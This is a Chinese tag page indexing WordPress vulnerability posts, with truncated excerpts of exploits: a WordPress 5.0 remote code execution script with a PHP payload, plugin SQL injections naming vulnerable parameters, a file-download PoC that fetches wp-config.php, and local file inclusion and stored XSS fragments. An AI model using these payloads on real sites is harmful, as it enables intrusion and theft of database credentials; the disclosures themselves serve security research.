当前标签

wordpress漏洞

WordPress 5.0 远程代码执行

WordPress Core 5.0 - Remote Code Execution Exploit var wpnonce = ''; var ajaxnonce = ''; var wp_attached_file = ''; var imgurl = ''; var postajaxdata = ''; var post_id = 0; var cmd = '<!--?php phpinfo();/*'; var ...

WordPress Ultimate Product Catalogue 4.2.2 Plugin – SQL Injection

# Version: 4.2.2 # Tested on: Ubuntu 16.04 1 - Description: Type user access: register user. $_POST[‘CatID’] is not escaped. http://lenonleite.com.br/en/blog/2017/05/31/english-ultimate-product-catalogue-4-2-2-sql-inj...

WordPress Huge-IT Video Gallery 2.0.4 SQL注入

Advisory ID: DC-2017-01-009 SQL injection Vulnerable Function: $wpdb->get_var( $query ); Vulnerable Variable: $_POST['cat_search'] Vulnerable URL: http://www.vulnerablesite.com/wp-admin/admi...

WordPress KittyCatfish 2.2 Plugin SQL Injection Vulnerability

1. Description An unescaped parameter was found in KittyCatfish version 2.2 (WP plugin). An attacker can exploit this vulnerability to read from the database. The get oarameter 'kc_ad' is vulnerable. 2. Proof of conc...

WordPress强制下载任意文件下载漏洞

###################### # PoC ###################### # [+] Using `force-download.php` file from `Wordpress websites we can download any file. # # [!] http://ihonker.org/force-download.php?file=wp-config.php # ##...

WordPress WP Fastest Cache 0.8.5.9 文件包含漏洞

WordPress WP Fastest Cache plugin version 0.8.5.9 suffers from a local file inclusion vulnerability. <html> <body> <form action="http://<target>/wp-admin/admin-ajax.php" meth...

WordPress Karma 4.7 – Responsive Theme Exploit

<?php /**  * Exploit Title: Karma Theme Exploit  * Version: 4.7  * Tested on: Debian 8, PHP 5.6.17-3  * Type: Authenticated Options overwrite, Stored XSS  * Time line: Found [28-Apr-2016], Vendor notified [...

1234

插入图片
返回顶部